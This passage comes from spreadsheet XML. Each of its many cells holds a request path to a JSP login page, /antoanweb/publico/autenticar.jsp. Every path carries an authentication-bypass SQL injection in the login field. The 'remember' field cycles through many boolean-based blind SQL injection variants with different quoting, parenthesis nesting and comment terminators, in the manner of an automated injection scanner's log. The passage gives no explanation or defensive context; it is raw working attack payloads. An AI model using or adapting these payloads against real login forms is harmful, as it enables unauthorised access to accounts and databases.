    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9094)ornot(3089=3089)and(9289=9289&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2819)ornot(1439=7347)and(400=400&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3885&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3854))ornot(1406=1115)and((4469=4469&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2109))ornot(3089=3089)and((7670=7670&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6246))ornot(357=1191)and((5937=5937&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9761&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5258)))ornot(2000=5752)and(((3126=3126&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6168)))ornot(3089=3089)and(((8477=8477&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3043)))ornot(3124=770)and(((1705=1705&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4324&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1078ornot(4597=8954)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1672ornot(3089=3089)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6279ornot(8174=7014)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-474&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-727')ornot(3344=1474)and('qtmt'='qtmt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3824')ornot(3089=3089)and('drbg'='drbg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9875')ornot(8250=805)and('azkr'='azkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7690&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4950'))ornot(7393=3478)and(('oidl'='oidl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5643'))ornot(3089=3089)and(('xhht'='xhht&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5900'))ornot(9447=8356)and(('irkm'='irkm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-598&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3433')))ornot(4075=3977)and((('fqzl'='fqzl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3819')))ornot(3089=3089)and((('yklp'='yklp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9496')))ornot(4696=3208)and((('gvhi'='gvhi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7499&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2314'ornot(1596=874)and'evll'='evll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3622'ornot(3089=3089)and'jaxy'='jaxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4939'ornot(7796=9154)and'qyfb'='qyfb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5983&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2350')ornot(539=6246)and('wwoa'like'wwoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5790')ornot(3089=3089)and('cxog'like'cxog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5817')ornot(2534=3557)and('qcwl'like'qcwl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7070&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7185'))ornot(3915=5231)and(('zkuu'like'zkuu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2699'))ornot(3089=3089)and(('mupu'like'mupu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2470'))ornot(9539=5724)and(('dqdy'like'dqdy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2615&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9339')))ornot(1591=5850)and((('siba'like'siba&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3421')))ornot(3089=3089)and((('dqby'like'dqby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7638')))ornot(4437=2614)and((('oubo'like'oubo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2466&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2283'ornot(9420=3145)and'dpzl'like'dpzl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2326'ornot(3089=3089)and'zhfa'like'zhfa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7144'ornot(1495=3207)and'tzwk'like'tzwk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2440&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8615")ornot(6246=7644)and("enhp"="enhp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6641")ornot(3089=3089)and("mubp"="mubp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-36")ornot(3481=1243)and("yeog"="yeog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5690&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7539"))ornot(2556=2905)and(("wxgo"="wxgo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4161"))ornot(3089=3089)and(("kwhp"="kwhp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3423"))ornot(6248=4624)and(("jlfs"="jlfs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2533&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3049")))ornot(7463=3473)and((("cvlj"="cvlj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4215")))ornot(3089=3089)and((("btxq"="btxq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8699")))ornot(3612=2973)and((("xnmz"="xnmz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2935&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6150"ornot(3681=6323)and"jygd"="jygd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3997"ornot(3089=3089)and"bmif"="bmif&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-807"ornot(3536=5774)and"sgqk"="sgqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1688&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5156")ornot(4864=5026)and("pfnz"like"pfnz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7813")ornot(3089=3089)and("atxv"like"atxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3232")ornot(7346=4223)and("kvxm"like"kvxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3989&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5590"))ornot(3600=4836)and(("knsc"like"knsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3951"))ornot(3089=3089)and(("qume"like"qume&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7203"))ornot(1967=2873)and(("utff"like"utff&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2751&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6029")))ornot(6663=3489)and((("kdeb"like"kdeb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4064")))ornot(3089=3089)and((("xcym"like"xcym&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3303")))ornot(4198=5440)and((("dinp"like"dinp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5863&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2644"ornot(3278=3194)and"olrc"like"olrc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6125"ornot(3089=3089)and"paqm"like"paqm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9028"ornot(4541=3775)and"irli"like"irli&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8954&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3496)ornot(1220=1974)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5438)ornot(4202=4202)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6156)ornot(9067=6763)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9810&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7889')ornot(928=9033)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3313')ornot(4202=4202)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4790')ornot(4596=6987)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1680&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5261'ornot(3131=3836)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-599'ornot(4202=4202)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-262'ornot(5549=7970)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1439&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1037"ornot(7630=7630)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-333"ornot(4202=4202)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9204"ornot(4267=6811)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1120&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9140)ornot(177=4002)--and(2557=2557&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7841)ornot(4202=4202)--and(8048=8048&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8634)ornot(8061=217)--and(9325=9325&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6870&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5825))ornot(3914=3712)--and((1792=1792&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1047))ornot(4202=4202)--and((4466=4466&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3159))ornot(1119=3666)--and((4427=4427&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2076&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7985)))ornot(5126=806)--and(((8462=8462&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6725)))ornot(4202=4202)--and(((2657=2657&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6322)))ornot(3578=762)--and(((7968=7968&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7494&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6960ornot(8692=6993)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7345ornot(4202=4202)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8742ornot(4940=7682)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2578&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1470')ornot(1749=4211)--and('ljcd'='ljcd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8652')ornot(4202=4202)--and('gqpg'='gqpg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8455')ornot(1261=5420)--and('cdvr'='cdvr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6187&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9109'))ornot(2082=4358)--and(('tyiy'='tyiy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2241'))ornot(4202=4202)--and(('rvkn'='rvkn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9998'))ornot(8230=7743)--and(('yigc'='yigc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2558&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1760')))ornot(1986=8800)--and((('pgyd'='pgyd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7498')))ornot(4202=4202)--and((('rbcq'='rbcq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5697')))ornot(5200=4919)--and((('tmqr'='tmqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9423&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1171'ornot(6338=1534)--and'zrbd'='zrbd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8216'ornot(4202=4202)--and'tuwt'='tuwt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9970'ornot(7634=424)--and'lpwh'='lpwh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6038&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8278')ornot(780=6563)--and('snkr'like'snkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-302')ornot(4202=4202)--and('zbpb'like'zbpb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2580')ornot(8937=55)--and('cvjc'like'cvjc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7442&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6325'))ornot(6445=2395)--and(('dwky'like'dwky&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9262'))ornot(4202=4202)--and(('tddn'like'tddn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5999'))ornot(9694=8655)--and(('rvkf'like'rvkf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6067&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8347')))ornot(7171=3941)--and((('kqfw'like'kqfw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4000')))ornot(4202=4202)--and((('ddtb'like'ddtb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6609')))ornot(2261=9204)--and((('xbqa'like'xbqa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7418&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8599'ornot(5095=6744)--and'taoy'like'taoy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6136'ornot(4202=4202)--and'onrd'like'onrd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7826'ornot(7143=6971)--and'bbht'like'bbht&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5527&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8529")ornot(9673=4222)--and("ibga"="ibga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9749")ornot(4202=4202)--and("tmac"="tmac&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5205")ornot(1035=8080)--and("dryl"="dryl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1148&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-332"))ornot(6749=7294)--and(("rohv"="rohv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2893"))ornot(4202=4202)--and(("uyib"="uyib&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2566"))ornot(5966=7849)--and(("wmec"="wmec&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8923&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7338")))ornot(3537=3915)--and((("cifs"="cifs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4342")))ornot(4202=4202)--and((("zqod"="zqod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5438")))ornot(3947=505)--and((("udsa"="udsa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2626&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-877"ornot(6464=1391)--and"pbfu"="pbfu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3343"ornot(4202=4202)--and"zhhz"="zhhz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5002"ornot(3401=7543)--and"rxyr"="rxyr&amp;modo=entrar</t>
  </si>
  <si>
